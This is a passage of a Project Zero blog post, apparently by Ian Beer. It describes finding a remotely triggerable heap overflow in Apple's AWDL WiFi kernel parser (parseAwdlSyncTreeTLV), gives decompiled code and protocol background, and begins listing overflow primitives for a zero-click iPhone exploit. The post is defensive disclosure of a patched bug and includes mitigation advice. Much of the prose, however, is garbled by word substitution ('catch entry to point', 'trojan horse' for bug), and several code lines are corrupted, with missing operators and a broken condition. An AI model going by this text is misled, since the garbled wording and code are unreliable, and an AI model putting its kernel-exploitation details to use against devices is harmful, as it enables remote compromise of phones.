An iOS zero-click radio proximity exploit odyssey


Posted by Ian Beer, Mission Zero

NOTE: This specific difficulty modified into fastened ahead of the begin of Privateness-Maintaining Contact Tracing in iOS 13.5 in Could well 2020.

On this demo I remotely trigger an unauthenticated kernel memory corruption vulnerability which causes all iOS devices in radio-proximity to reboot, with no one interaction. Over the next 30’000 phrases I will duvet your entire direction of to lope from this contemporary demo to successfully exploiting this vulnerability in expose to streak arbitrary code on any nearby iOS instrument and grab all of the person info

Quoting @halvarflake’s Offensivecon keynote from February 2020:

“Exploits are the closest thing to “magic spells” we skills in the real world: Kind the upright incantation, prevail in faraway defend watch over over instrument.

For 6 months of 2020, whereas locked down in the corner of my bedroom surrounded by my lovely, screaming teenagers, I’ve been working on a magic spell of my have. No, sadly no longer an incantation to convince the teenagers to sleep in except 9am every morning, nonetheless as an different a wormable radio-proximity exploit which lets in me to reach entire defend watch over over any iPhone in my vicinity. Notice all of the photos, learn all of the electronic mail, copy all of the non-public messages and video display every thing which occurs on there in actual-time. 

The takeaway from this project must aloof no longer be: no person will exhaust six months of their lifestyles loyal to hack my phone, I’m fair.

As a replacement, it desires to be: one person, working on my own of their bedroom, modified into ready to manufacture a functionality which would enable them to severely compromise iPhone customers they’d reach into cease contact with.

Imagine the sense of vitality an attacker with this form of functionality must feel. As we all pour increasingly of our souls into these devices, an attacker can prevail in a like trove of information on an unsuspecting purpose.

What’s more, with directional antennas, better transmission powers and soft receivers the vary of such assaults is at risk of be appreciable.

I undoubtedly haven’t any proof that these disorders had been exploited in the wild; I figured out them myself by procedure of handbook reverse engineering. However we construct know that exploit distributors looked as if it can presumably perchance perchance pick scrutinize of these fixes. For example, pick this tweet from Ticket Dowd, the co-founder of Azimuth Security, an Australian “market-main info safety trade”:

This tweet from @mdowd on Could well 27th 2020 talked about a double free in BSS reachable through AWDL

The vulnerability Ticket is referencing right here is with no doubt one of many vulnerabilities I reported to Apple. You construct no longer scrutinize a fix enjoy that without needing a deep passion in this specific code.

This Vice article from 2018 provides an loyal overview of Azimuth and why they would perchance presumably also simply be attracted to such vulnerabilities. You also can believe that Azimuth’s judgement of their possibilities aligns with your individual and political opinions, that it is doubtless you’ll also no longer, that’s no longer the point. Unpatched vulnerabilities must not enjoy physical territory, occupied by only one facet. All people can exploit an unpatched vulnerability and Ticket Dowd wasn’t the most spirited person to begin tweeting about vulnerabilities in AWDL.

This has been the longest solo exploitation project I’ve ever worked on, taking round half a yr. However it be well-known to emphasize up entrance that the groups and companies supplying the world trade in cyberweapons enjoy this one must not customarily loyal folks working on my own. They’re effectively-resourced and centered groups of participating consultants, every with their have specialization. They construct no longer appear to be starting with fully no clue how bluetooth or wifi work. They moreover potentially have catch entry to to info and hardware I simply construct no longer have, enjoy pattern devices, particular cables, leaked source code, symbols recordsdata and so forth.

In spite of every thing, an iPhone is rarely always designed to enable other folks to manufacture capabilities enjoy this. So what went so harmful that it modified into which that that it is doubtless you’ll recall to mind? Unfortunately, it be the identical aged chronicle. A rather trivial buffer overflow programming error in C++ code in the kernel parsing untrusted info, exposed to faraway attackers.

Of direction, this entire exploit uses loyal a single memory corruption vulnerability to compromise the flagship iPhone 11 Expert instrument. With loyal this one difficulty I modified into ready to defeat all of the mitigations in expose to remotely prevail in native code execution and kernel memory learn and write.

Relative to the size and complexity of these codebases of major tech companies, the sizes of the protection groups devoted to proactively auditing their product’s source code to scrutinize for vulnerabilities are very tiny. Android and iOS are entire customized tech stacks. It’s no longer loyal kernels and instrument drivers nonetheless dozens of attacker-reachable apps, heaps of of products and providers and hundreds of libraries working on devices with customized hardware and firmware.

In actuality reading all of the code, in conjunction with every contemporary line moreover to the decades of legacy code, is unrealistic, as a minimum with the division of resources customarily considered in tech the put the ratio of safety engineers to builders is at risk of be 1: 20, 1: 40 or even better.

To form out this insurmountable difficulty, safety groups rightly put a heavy emphasis on fabricate level review of contemporary ingredients. Right here is good: getting stuff upright at the fabricate fragment can attend restrict the affect of the errors and bugs that can inevitably happen. For example, guaranteeing that a brand contemporary hardware peripheral enjoy a GPU can only ever catch entry to a restricted allotment of physical memory helps constrain the worst-case final consequence if the GPU is compromised by an attacker. The attacker is optimistically compelled to search out an extra vulnerability to “lengthen the exploit chain”, having to make utilize of an ever-increasing series of vulnerabilities to hack a single instrument. Retrofitting constraints enjoy this to already-shipping ingredients would be a lot tougher, if no longer not doubtless.

To boot to manufacture-level critiques, safety groups form out the complexity of their products by attempting to constrain what an attacker is at risk of be ready to construct with a vulnerability. These are mitigations. They pick many forms and is at risk of be contemporary, enjoy stack cookies or utility specific, enjoy Recount ID in JavaScriptCore. The ensures which would be made by mitigations are customarily weaker than these made by fabricate-level ingredients nonetheless the purpose is similar: to “lengthen the exploit chain”, optimistically forcing an attacker to search out a brand contemporary vulnerability and incur some cost.

The third procedure widely faded by defensive groups is fuzzing, which attempts to emulate an attacker’s vulnerability finding direction of with brute power. Fuzzing is mostly misunderstood as an efficient capability to hunt easy-to-fetch vulnerabilities or “low-hanging fruit”. A more proper description would be that fuzzing is an efficient capability to hunt easy-to-fuzz vulnerabilities. Quite quite a bit of vulnerabilities which a expert vulnerability researcher would pick into memoir low-hanging fruit can require reaching a program point that no fuzzer lately will likely be ready to reach, irrespective of the compute resources faded.

The verbalize for tech companies and below no circumstances uncommon to Apple, is that whereas fabricate review, mitigations, and fuzzing are well-known for building stable codebases, they’re a ways from enough.

Fuzzers can no longer motive about code in the identical formulation a expert vulnerability researcher can. This implies that without concerted handbook effort, vulnerabilities with a comparatively low price-of-discovery remain rather prevalent. A major center of attention of my work over the last few years had been attempting to specialise in that the iOS codebase, loyal enjoy any other major trendy running system, has a excessive vulnerability density. No longer only that, nonetheless there could be a excessive density of “proper bugs”, that’s, vulnerabilities which allow the appearance of great irregular machines.

This idea of “proper bugs” is one thing that offensive researchers perceive intuitively nonetheless one thing which would be laborious to grab for these without an exploit pattern background. Thomas Dullien’s irregular machines paper provides the most spirited introduction to the idea of irregular machines and their applicability to exploitation. Given a sufficiently complicated pronounce machine running on attacker-controlled enter, a “proper trojan horse” lets in the attacker-controlled enter to as an different change into “code”, with the “proper trojan horse” introducing a brand contemporary, surprising pronounce transition into a brand contemporary, unintended pronounce machine. The art work of exploitation then becomes the art work of determining how to make utilize of vulnerabilities to introduce sufficiently great contemporary pronounce transitions such that, as an discontinue purpose, the attacker-provided enter becomes code for a brand contemporary, irregular machine in a position to arbitrary system interactions.

It’s with this irregular machine that mitigations will likely be defeated; even a mitigation without implementation flaws is mostly no match for a sufficiently great irregular machine. An attacker attempting to fetch vulnerabilities is asking particularly for irregular machine primitives. Their auditing direction of is centered on a specific attack-surface and specific vulnerability lessons. This stands in stark distinction to a product safety personnel with accountability for every which that that it is doubtless you’ll recall to mind attack surface and each vulnerability class.

As things stand now in November 2020, I give it some thought be aloof rather which that that it is doubtless you’ll recall to mind for a motivated attacker with loyal one vulnerability to manufacture a sufficiently great irregular machine to entirely, remotely compromise high-of-the-vary iPhones. Of direction, the ingredients of that direction of that are hardest doubtlessly must not these which that it is doubtless you’ll also rely on, as a minimum no longer without an appreciation for irregular machines.

Vulnerability discovery stays a pretty linear feature of time invested. Defeating mitigations stays a matter of making a sufficiently great irregular machine. Concretely, Pointer Authentication Codes (PAC) supposed I could presumably perchance perchance no longer pick the in vogue divulge shortcut to a extremely great irregular machine through trivial program counter defend watch over and ROP or JOP. As a replacement I constructed a faraway arbitrary memory learn and write frail which in practise is loyal as great and one thing which the present implementation of PAC, which focuses nearly completely on proscribing defend watch over-drift, wasn’t designed to mitigate.

Secure system fabricate didn’t put the day due to the inevitable tradeoffs alive to with building shippable products. Ought to aloof this form of fancy parser driving more than one, complicated pronounce machines undoubtedly be working in kernel context against untrusted, faraway enter? Ideally, no, and this modified into nearly with no doubt flagged for the period of a fabricate review. However there are tight timing constraints for this specific feature that means holding apart the parser is non-trivial. It’s with no doubt which that that it is doubtless you’ll recall to mind, nonetheless that is at risk of be a first-rate engineering difficulty a ways previous the scope of the feature itself. On the discontinue of the day, it be ingredients which promote telephones and this option will not be any doubt very frigid; I will entirely perceive the judgement call which modified into made to enable this fabricate irrespective of the risks.

However risk capability there are penalties if things construct no longer lope as expected. By formulation of instrument vulnerabilities it is miles at risk of be laborious to glue the dots between these risks which had been permitted and the penalties. I construct no longer know if I’m the most spirited one who figured out these vulnerabilities, though I’m the first to expose Apple about them and work with Apple to repair them. Over the next 30’000 phrases I will uncover you what I modified into ready to construct with a single vulnerability in this attack surface and optimistically present you with a brand contemporary or renewed insight into the vitality of the irregular machine.

I construct no longer tell all hope is lost; there could be loyal an dreadful lot more left to construct. Within the conclusion I will strive to fragment some suggestions for what I have confidence is at risk of be required to manufacture a more stable iPhone.

Whereas you happen to ought to utilize alongside it is doubtless you’ll presumably perchance perchance presumably fetch tiny print connected to difficulty 1982 in the Mission Zero difficulty tracker.

In 2018 Apple shipped an iOS beta manufacture without stripping feature name symbols from the kernelcache. Whereas this modified into nearly with no doubt an error, events enjoy this attend researchers on the defending facet vastly. One amongst the techniques I enjoy to procrastinate is to scroll by procedure of this giant list of symbols, reading bits of assembly right here and there. One day I modified into wanting by procedure of IDA’s inferior-references to memmove with no specific purpose in suggestions when one thing jumped out as being price a closer scrutinize:

IDA Expert’s inferior references window shows a huge series of calls to memmove. A callsite in IO80211AWDLPeer::parseAwdlSyncTreeTLV is highlighted

Having feature names provides a giant quantity of missing context for the vulnerability researcher. A truly stripped 30+MB binary blob such because the iOS kernelcache is at risk of be overwhelming. There could be a giant quantity of work to resolve how every thing fits collectively. What bits of code are exposed to attackers? What sanity checking is occurring and the put? What execution context are various ingredients of the code working in?

On this case this specific driver is moreover on hand on MacOS, the put feature name symbols are no longer stripped.

There are three things which made this highlighted feature stand out to me:

1) The feature name:

IO80211AWDLPeer::parseAwdlSyncTreeTLV

At this point, I had no thought what AWDL modified into. However I did know that TLVs (Kind, Size, Cost) are customarily faded to give structure to info, and parsing a TLV can also point out it be coming from somewhere untrusted. And the 80211 is a giveaway that this doubtlessly has one thing to construct with WiFi. Worth a closer scrutinize. Right here is the raw decompilation from Hex-Rays which we’ll pleasing up later:

__int64 __fastcall IO80211AWDLPeer::parseAwdlSyncTreeTLV(__int64 this, __int64 buf)

{

  const void *v3; // x20

  _DWORD *v4; // x21

  int v5; // w8

  unsigned __int16 v6; // w25

  unsigned __int64 some_u16; // x24

  int v8; // w21

  __int64 v9; // x8

  __int64 v10; // x9

  unsigned __int8 *v11; // x21

  v3=(const void *)(buf + 3);

  v4=(_DWORD *)(this + 1203);

  v5=*(_DWORD *)(this + 1203);

  if ( ((v5 + 1) & 0xFFFFu)

    v6=v5 + 1;

  else

    v6=10;

  some_u16=*(unsigned __int16 *)(buf + 1) / 6uLL;

  if ( (_DWORD)some_u16==v6 )

  {

    some_u16=v6;

  }

  else

  {

    IO80211Peer::logDebug(

      this,

      0x8000000000000uLL,

      “Peer %02X:%02X:%02X:%02X:%02X:%02X: PATH LENGTH error hc %u calc %u n”,

      *(unsigned __int8 *)(this + 32),

      *(unsigned __int8 *)(this + 33),

      *(unsigned __int8 *)(this + 34),

      *(unsigned __int8 *)(this + 35),

      *(unsigned __int8 *)(this + 36),

      *(unsigned __int8 *)(this + 37),

      v6,

      some_u16);

    *v4=some_u16;

    v6=some_u16;

  }

  v8=memcmp((const void *)(this + 5520), v3, (unsigned int)(6 some_u16));

  memmove((void *)(this + 5520), v3, (unsigned int)(6 some_u16));

Definitely looks like it’s parsing something. There’s some fiddly byte manipulation; something which sort of looks like a bounds check and an error message.

2) The second thing which stands out is the error message string:

“Peer %02X:%02X:%02X:%02X:%02X:%02X: PATH LENGTH error hc %u calc %un” 

Any kind of LENGTH error sounds like fun to me. Especially when you look a little closer…

3) The control flow graph.

Reading the code a bit more closely it appears that although the log message contains the word “error” there’s nothing which is being treated as an error condition here. IO80211Peer::logDebug isn’t a fatal logging API, it just logs the message string. Tracing back the length value which is passed to memmove, regardless of which path is taken we still end up with what looks like an arbitrary u16 value from the input buffer (rounded down to the nearest multiple of 6) passed as the length argument to memmove.

Can it really be this easy? Typically, in my experience, bugs this shallow in real attack surfaces tend to not work out. There’s usually a length check somewhere far away; you’ll spend a few days trying to work out why you can’t seem to reach the code with a bad size until you find it and realize this was a CVE from a decade ago. Still, worth a try.

But what even is this attack surface?

A bit of googling later we learn that awdl is a type of welsh poetry, and also an acronym for an Apple-proprietary mesh networking protocol probably called Apple Wireless Direct Link. It appears to be used by AirDrop amongst other things.

The first goal is to determine whether we can really trigger this vulnerability remotely.

We can see from the casts in the parseAwdlSyncTreeTLV method that the type-length-value objects have a single-byte type then a two-byte length followed by a payload value.

In IDA selecting the function name and going View -> Launch subviews -> Unfavorable references (or pressing ‘x‘) shows IDA only figured out one caller of this implies:

IO80211AWDLPeer::actionFrameReport

      case 0x14u:

        if (v109[20]>=2)

          goto LABEL_126;

        ++v109[0x14];

        IO80211AWDLPeer::parseAwdlSyncTreeTLV(this, bytes);

So 0x14 is at risk of be the form imprint, and v109 looks enjoy it be doubtlessly counting the series of these TLVs.

Having a scrutinize in the list of feature names we can moreover scrutinize that there could be a corresponding BuildSyncTreeTlv capability. If shall we catch two machines to affix an AWDL network, could presumably perchance perchance we loyal utilize the MacOS kernel debugger to form the SyncTree TLV very big ahead of it be despatched?

Yes, that it is doubtless you’ll. Using two MacOS laptops and enabling AirDrop on both of them I faded a kernel debugger to edit the SyncTree TLV despatched by with no doubt one of many laptops, which brought about the opposite one to kernel terror due to an out-of-bounds memmove.

Whereas you happen to is at risk of be attracted to precisely construct that pick a scrutinize at the usual vulnerability portray I despatched to Apple on November 29th 2019. This vulnerability modified into fastened as CVE-2020-3843 on January 28th 2020 in iOS 13.1.1/MacOS 10.15.3.

Our race is exclusively loyal starting. Getting from right here to working an implant on an iPhone 11 Expert with no one interaction goes to pick out a whereas…

There are a series of papers from the Secure Mobile Networking Lab at TU Darmstadt in Germany (moreover identified as SEEMOO) which scrutinize at AWDL. The researchers there have carried out a appreciable quantity of reverse engineering (moreover to having catch entry to to a couple leaked Broadcom source code) to manufacture these papers; they’re expedient to imprint AWDL and rather a lot the most spirited resources in the market. 

The first paper One Billion Apples’ Secret Sauce: Recipe for the Apple Wireless Bid Hyperlink Advert hoc Protocol covers the layout of the frames faded by AWDL and the operation of the channel-hopping mechanism.

The 2nd paper A Billion Launch Interfaces for Eve and Mallory: MitM, DoS, and Tracking Attacks on iOS and macOS Thru Apple Wireless Bid Hyperlink focuses more on Airdrop, with no doubt one of many OS ingredients which uses AWDL. This paper moreover examines how Airdrop uses Bluetooth Low Vitality commercials to enable AWDL interfaces on other devices.

The learn neighborhood wrote an initiate source AWDL client called OWL (Launch Wireless Hyperlink). Despite the indisputable truth that I modified into unable to catch OWL to work it modified into alternatively an expedient reference and I did utilize some of their physique definitions.

AWDL is an Apple-proprietary mesh networking protocol designed to enable Apple devices enjoy iPhones, iPads, Macs and Apple Watches to form ad-hoc ogle-to-ogle mesh networks. Probability is that must you have an Apple instrument you is at risk of be increasing or connecting to these transient mesh networks more than one cases a day without even realizing it.

Whereas you happen to have ever faded Airdrop, streamed music to your Homepod or Apple TV through Airplay or faded your iPad as a secondary point out with Sidecar then you no doubt had been the utilization of AWDL. And even must you haven’t any longer been the utilization of these ingredients, if other folks nearby had been then it be rather which that that it is doubtless you’ll recall to mind your instrument joined the AWDL mesh network they had been the utilization of anyway.

AWDL is rarely always a customised radio protocol; the radio layer is WiFi (particularly 802.11g and 802.11a). 

Most other folks’s skills with WiFi involves connecting to an infrastructure network. At home that it is doubtless you’ll also prance a WiFi catch entry to point into your modem which creates a WiFi network. The catch entry to point broadcasts a network name and accepts purchasers on a specific channel.

To reach other devices on the internet you ship WiFi frames to the catch entry to point (1). The catch entry to point sends them to the modem (2) and the modem sends them to your ISP (3,4) which sends them to the internet:

The topology of a recent home network

To reach other devices on your put WiFi network you ship WiFi frames to the catch entry to point and the catch entry to point relays them to the opposite devices:

WiFi purchasers communicate through an catch entry to point, even in the event that they’re internal WiFi vary of every other

If truth be told the wireless indicators construct no longer propagate as straight lines between the patron and catch entry to point nonetheless unfold out in location such that the two client devices can also simply be ready to scrutinize the frames transmitted by every other to the catch entry to point.

If WiFi client devices can already ship WiFi frames straight to 1 every other, then why have the catch entry to point the least bit? Without the complexity of the catch entry to point it is doubtless you’ll presumably perchance perchance presumably with no doubt have procedure more magical experiences which “loyal work”, requiring no physical setup.

There are diversified protocols for doing loyal this, every with their have tradeoffs. Tunneled Bid Hyperlink Setup (TDLS) lets in two devices already on the identical WiFi network to barter an instantaneous connection to 1 every other such that frames can also simply no longer be relayed by the catch entry to point.

Wi-Fi Bid lets in two devices no longer already on the identical network to construct an encrypted ogle-to-ogle Wi-Fi network, the utilization of WPS to bootstrap a WPA2-encrypted ad-hoc network.

Apple’s AWDL doesn’t require guests to already be on the identical network to construct a ogle-to-ogle connection, nonetheless unlike Wi-Fi Bid, AWDL has no constructed-in encryption. No longer like TDLS and Wi-Fi Bid, AWDL networks can dangle more than two guests and they are going to moreover form a mesh network configuration the put more than one hops are required.

AWDL has every other trick up its sleeve: an AWDL client is at risk of be connected to an AWDL mesh network and a recent AP-basically based infrastructure network at the identical time, the utilization of only one Wi-Fi chipset and antenna. To scrutinize how that works we favor to scrutinize barely of more at some Wi-Fi fundamentals.

TDLS

Wi-Fi Bid

AWDL

Requires AP network

Yes

No

No

Encrypted

Yes

Yes

No

Understand Limit

2

2

Limitless

Concurrent AP Connection Which that that it is doubtless you’ll recall to mind

No

No

Yes

There are over 20 years of WiFi standards spanning various frequency ranges of the electromagnetic spectrum, from as low as 54MHz in 802.11af up to over 60GHz in 802.11ad. Such networks are rather esoteric and person instruments uses frequencies cease to 2.4 Ghz or 5 Ghz. Ranges of frequencies are split into channels: to illustrate in 802.11g channel 6 capability a 22 Mhz vary between 2.426 GHz and a pair of.448 GHz.

More moderen 5 GHz standards enjoy 802.11ac enable for wider channels up to 160 MHz; 5 Ghz channel numbers therefore encode both the heart frequency and channel width. Channel 44 is a 20 MHz vary between 5.210 Ghz and 5.230 Ghz whereas channel 46 is a 40 Mhz vary which begins at the identical lower frequency as channel 44 of 5.210 GHz nonetheless extends up to 5.250 GHz.

AWDL customarily sends and receives frames on channel 6 and 44. How does that work must you is at risk of be moreover the utilization of your put WiFi network on a clear channel?

In expose to appear to be connected to two separate networks on separate frequencies at the identical time, AWDL-honorable devices split time into 16ms chunks and expose the WiFi controller chip to rapidly switch between the channel for the infrastructure network and the channel being faded by AWDL:

A recent AWDL channel hopping sequence, alternating between tiny lessons on AWDL social channels and longer lessons on the AP channel

The specific channel sequence is dynamic. Peers broadcast their channel sequences and adapt their have sequence to compare guests with which they enjoy to communicate. The lessons when an AWDL ogle is listening on an AWDL channel are identified as Availability Windows.

On this form the instrument can appear to be connected to the catch entry to point whereas moreover participating in the AWDL mesh at the identical time. In spite of every thing, frames is at risk of be missed from both the AP and the AWDL mesh nonetheless the protocols are treating radio as an unreliable transport anyway so this only undoubtedly has an affect on throughput. A big section of the AWDL protocol involves attempting to synchronize the channel switching between guests to enhance throughput.

The SEEMOO labs paper has a procedure more detailed scrutinize at the AWDL channel hopping mechanism.

These are the first instrument-controlled fields which lope over the air in a WiFi physique:

struct ieee80211_hdr {

  uint16_t frame_control;

  uint16_t duration_id;

  struct ether_addr dst_addr;

  struct ether_addr src_addr;

  struct ether_addr bssid_addr;

  uint16_t seq_ctrl;

} __attribute__((packed));

The first observe incorporates fields which interpret the form of this physique. These are broadly split into three physique households: Management, Buy watch over and Data. The building blocks of AWDL utilize a subtype of Management frames called Circulation frames.

The take care of fields in an 802.11 header can have various meanings counting on the context; for our applications the first is the shuttle jam instrument MAC take care of, the 2nd is the source instrument MAC and the third is the MAC take care of of the infrastructure network catch entry to point or BSSID.

Since AWDL is a ogle-to-ogle network and doesn’t utilize an catch entry to point, the BSSID discipline of an AWDL physique is determined to the laborious-coded AWDL BSSID MAC of 00: 25: 00:ff: 94: 73. It’s this BSSID which AWDL purchasers are attempting to fetch once they’re attempting to fetch other guests. Your router can also simply no longer unintentionally utilize this BSSID because Apple owns the 00: 25: 00 OUI.

The layout of the bytes following the header relies on the physique form. For an Circulation physique the next byte is a class discipline. There are a huge series of categories which allow devices to alternate every form of information. For example class 5 covers diversified forms of radio measurements enjoy noise histograms.

The particular class imprint 0x7f defines this physique as a dealer-specific action physique that means that the next three bytes are the OUI of the dealer in price of this put collectively action physique layout.

Apple owns the OUI 0x00 0x17 0xf2 and that’s the OUI faded for AWDL action frames. Every byte in the physique after that is now proprietary, outlined by Apple rather then an IEEE contemporary.

The SEEMOO labs personnel have carried out a huge job reversing the AWDL action physique layout and they developed a wireshark dissector.

AWDL Circulation frames have a put-sized header followed by a variable length series of TLVs:

The layout of fields in an AWDL physique: 802.11 header, action physique header, AWDL fastened header and variable length AWDL payload

Every TLV has a single-byte form followed by a two-byte length which is the length of the variable-sized payload in bytes.

There are two forms of AWDL action physique: Grasp Indication Frames (MIF) and Periodic Synchronization Frames (PSF). They vary only of their form discipline and the series of TLVs they dangle.

An AWDL mesh network has a single master node made up our minds by an election direction of. Every node broadcasts a MIF containing a master metric parameter; the node with the highest metric becomes the master node. It’s that this master node’s PSF timing values which desires to be adopted because the comely timing values for all of the opposite nodes to synchronize to; in this form their availability windows can overlap and the network can have the next throughput.

Befriend in 2017, Mission Zero researcher Gal Beniamini printed a seminal 5-section weblog put up series entitled Over The Air the put he exploited a vulnerability in the Broadcom WiFi chipset to reach native code execution on the WiFi controller, then pivoted through an iOS kernel trojan horse in the chipset-to-Utility Processor interface to enact arbitrary kernel memory learn/write.

In that case, Gal centered a vulnerability in the Broadcom firmware when it modified into parsing info structures related to TDLS. The raw form of these info structures modified into handled by the chipset firmware itself and never made it to the utility processor.

In distinction, for AWDL the frames appear to be parsed of their entirety on the Utility Processor by the kernel driver. Whilst this implies we can come across rather a few the AWDL code, it moreover capability that we’ll have to manufacture your entire exploit on high of primitives we can manufacture with the AWDL parser, and these primitives will must aloof be great enough to remotely compromise the instrument. Apple continues to ship contemporary mitigations with every iOS begin and hardware revision, and we’re needless to claim going to purpose the latest iPhone 11 Expert with the largest series of these mitigations in put.

Can we undoubtedly manufacture one thing great enough to remotely defeat kernel pointer authentication loyal with a linear heap overflow in a WiFi physique parser? Defeating mitigations customarily involves building up a library of tricks to attend manufacture increasingly great primitives. You also can start with a linear heap overflow and put it to use to manufacture an arbitrary learn, then utilize that to attend manufacture an arbitrary bit flip frail and so forth.

I’ve constructed a library of tricks and tactics enjoy this for doing local privilege escalations on iOS nonetheless I will have to begin again from scratch for this imprint contemporary attack surface.

The first two C++ lessons to familiarize ourselves with are IO80211AWDLPeer and IO80211AWDLPeerManager. There could be one IO80211AWDLPeer object for every AWDL ogle which a instrument has no longer too lengthy previously obtained a physique from. A background timer destroys sluggish IO80211AWDLPeer objects. There could be a single instance of the IO80211AWDLPeerManager which is in price of orchestrating interactions between this instrument and other guests.

Show camouflage that though we have some feature names from the iOS 12 beta 1 kernelcache and the MacOS IO80211Family driver we construct no longer have object layout info. Brandon Azad identified that the MacOS prelinked kernel image does dangle some structure layout info in the __CTF.__ctf fragment which would be parsed by the dtrace ctfdump instrument. Unfortunately this looks to only dangle structures from the initiate source XNU code.

The sizes of OSObject-basically based IOKit objects can without complications be particular statically nonetheless the names and forms of person fields can no longer. One amongst the most time-fascinating responsibilities of this entire project modified into the painstaking direction of of reverse engineering the forms and meanings of a big series of the fields in these objects. Every IO80211AWDLPeer object is quite 6KB; that’s rather a few capability fields. Having structure layout info would doubtlessly have saved months.

Whereas you happen to is at risk of be a defender building a risk mannequin construct no longer interpret this the harmful formulation: I’d pick any competent actual-world exploit pattern personnel has this info; both from photos or devices with chubby debug symbols they’ve obtained with or without Apple’s consent, insider catch entry to, or even loyal from monitoring each firmware image ever publicly released to test whether debug symbols had been released by likelihood. Greater groups could presumably perchance perchance even have other folks devoted to building customized reversing instruments.

Six years previously I had hoped Mission Zero would be ready to catch expert catch entry to to info sources enjoy this. Six years later and I’m aloof spending months reversing structure layouts and naming variables.

We will pick IO80211AWDLPeerManager::actionFrameInput because the point the put untrusted raw AWDL physique info begins being parsed. There could be de facto a separate, earlier processing layer in the WiFi chipset driver nonetheless its parsing is minimal.

Every physique obtained whereas the instrument is listening on a social channel which modified into despatched to the AWDL BSSID finally ends up at actionFrameInput, wrapped in an mbuf structure. Mbufs are an anachronistic info structure faded for wrapping collections of networking buffers. The mbuf API is the stuff of nightmares, nonetheless that’s no longer in scope for this blogpost.

The mbuf buffers are concatenated to catch a contiguous physique in memory for parsing, then IO80211PeerManager::findPeer is called, passing the source MAC take care of from the obtained physique:

IO80211AWDLPeer*

IO80211PeerManager::findPeer(struct ether_addr *peer_mac)

If an AWDL physique has no longer too lengthy previously been obtained from this source MAC then this option returns a pointer to an present IO80211AWDLPeer structure representing the ogle with that MAC. The IO80211AWDLPeerManager uses a pretty complicated priority queue info structure called IO80211CommandQueue to store tricks to these for the time being full of life guests.

If the ogle is rarely always explain in the IO80211AWDLPeerManager‘s queue of guests then a brand contemporary IO80211AWDLPeer object is allocated to verbalize this contemporary ogle and it be inserted into the IO80211AWDLPeerManager‘s guests queue.

As soon as a reliable ogle object has been figured out the IO80211AWDLPeerManager then calls the actionFrameReport capability on the IO80211AWDLPeer so as that it can perchance address the action physique.

This implies is in price of many of the AWDL action physique facing and incorporates many of the untrusted parsing. It first updates some timestamps then reads diversified fields from TLVs in the physique the utilization of the IO80211AWDLPeerManager::getTlvPtrForType capability to extract them straight from the mbuf. After this initial parsing comes the important thing loop which takes every TLV in flip and parses it.

First every TLV is passed to IO80211AWDLPeer::tlvCheckBounds. This implies has a hardcoded list of specific minimum and maximum TLV lengths for some of the supported TLV forms. For forms no longer explicitly listed it enforces a maximum length of 1024 bytes. I talked about earlier that I customarily encounter code constructs which scrutinize enjoy shallow memory corruption only to later seek a bounds test a ways-off. Right here is precisely that roughly manufacture, and is undoubtedly the put Apple added a bounds test in the patch.

Kind 0x14 (which has the vulnerability in the parser) is rarely always explicitly listed in tlvCheckBounds so it gets the default better length restrict of 1024, a glorious deal better than the 60 byte buffer allocated for the shuttle jam buffer in the IO80211AWDLPeer structure.

This sample of environment apart bounds checks a ways off from parsing code is fragile; it be too easy to put out of your mind or no longer imprint that once adding code for a brand contemporary TLV form it be moreover a requirement to interchange the tlvCheckBounds feature. If this sample is faded, strive to reach up with a formulation to construct in power that contemporary code must explicitly tell an better inch right here. One probability can also simply be to form sure an enum is faded for the form and wrap the tlvCheckBounds capability in a pragma to rapidly enable clang’s -Wswitch-enum warning as an error:

#pragma clang diagnostic push

#pragma diagnostic error “-Wswitch-enum”

IO80211AWDLPeer::tlvCheckBounds(…) {

  switch(tlv->form) {

    case type_a:

      …;

    case type_b:

      …;

  }
}

#pragma clang diagnostic pop

This causes a compilation error if the switch observation doesn’t have an specific case observation for every imprint of the tlv->form enum.

Static prognosis instruments enjoy Semmle can moreover attend right here. The EnumSwitch class is at risk of be faded enjoy in this instance code to set up whether all enum values are explicitly handled.

If the tlvCheckBounds checks pass then there could be a switch observation with a case to parse every supported TLV:

Kind

Handler

0x02

IO80211AWDLPeer::processServiceResponseTLV

0x04

IO80211AWDLPeer::parseAwdlSyncParamsTlvAndTakeAction

0x05

IO80211AWDLPeer::parseAwdlElectionParamsV1

0x06

inline parsing of serviceParam

0x07

IO80211Understand::parseHTCapTLV

0x0c

nop

0x10

inline parsing of ARPA

0x11

IO80211Understand::parseVhtCapTLV

0x12

IO80211AWDLPeer::parseAwdlChanSeqFromChanSeqTLV

0x14

IO80211AWDLPeer::parseAwdlSyncTreeTLV

0x15

inline parser extracting 2 bytes

0x16

IO80211AWDLPeer::parseBloomFilterTlv

0x17

inlined parser of NSync

0x1d

IO80211AWDLPeer::parseBssSteeringTlv

Right here’s a cleaned up decompilation of the related parts of the parseAwdlSyncTreeTLV capability which contains the vulnerability:

int

IO80211AWDLPeer::parseAwdlSyncTreeTLV(awdl_tlvtlv)

{

  u64 new_sync_tree_size;

  u32 old_sync_tree_size=this->n_sync_tree_macs + 1;

  if (old_sync_tree_size>=10 ) {

    old_sync_tree_size=10;

  }

 

  if (old_sync_tree_size==tlv->len/6 ) {

    new_sync_tree_size=old_sync_tree_size;

  } else {

    new_sync_tree_size=tlv->len/6;

    this->n_sync_tree_macs=new_sync_tree_size;

  }

  memcpy(this->sync_tree_macs, &tlv->val[0], 6 new_sync_tree_size);

sync_tree_macs is a 60-byte inline array in the IO80211AWDLPeer structure, at offset +0x1648. That’s enough location to store 10 MAC addresses. The IO80211AWDLPeer object is 0x16a8 bytes in size that means that is at risk of be allocated in the kalloc.6144 zone.

tlvCheckBounds will build in power a maximum imprint of 1024 for the length of the SyncTree TLV. The TLV parser will round that imprint all of the formulation down to the closest more than with no doubt one of 6 and copy that series of bytes into the sync_tree_macs array at +0x1648. It will likely be our memory corruption frail: a linear heap buffer overflow in 6-byte chunks which would perchance rotten all of the fields in the IO80211AWDLPeer object previous +0x16a8 and then a few hundred bytes off of the discontinue of the kalloc.6144 zone chunk. We can without complications reason IO80211AWDLPeer objects to be allocated subsequent to 1 every other by sending AWDL frames from a huge series of various spoofed source MAC addresses in rapid succession. This provides us four tough primitives to be aware of as we open to search out a course to exploitation:

1) Corrupting fields after the sync_tree_macs array in the IO80211AWDLPeer object:

Overflowing into the fields at the discontinue of the ogle object

2) Corrupting the lower fields of an IO80211AWDLPeer object groomed subsequent to this one:

Overflowing into the fields in the start of a ogle object subsequent to this one

3) Corrupting the lower bytes of every other object form we can groom to utilize a ogle in kalloc.6144:

Overflowing into a clear form of object subsequent to this ogle in the identical zone

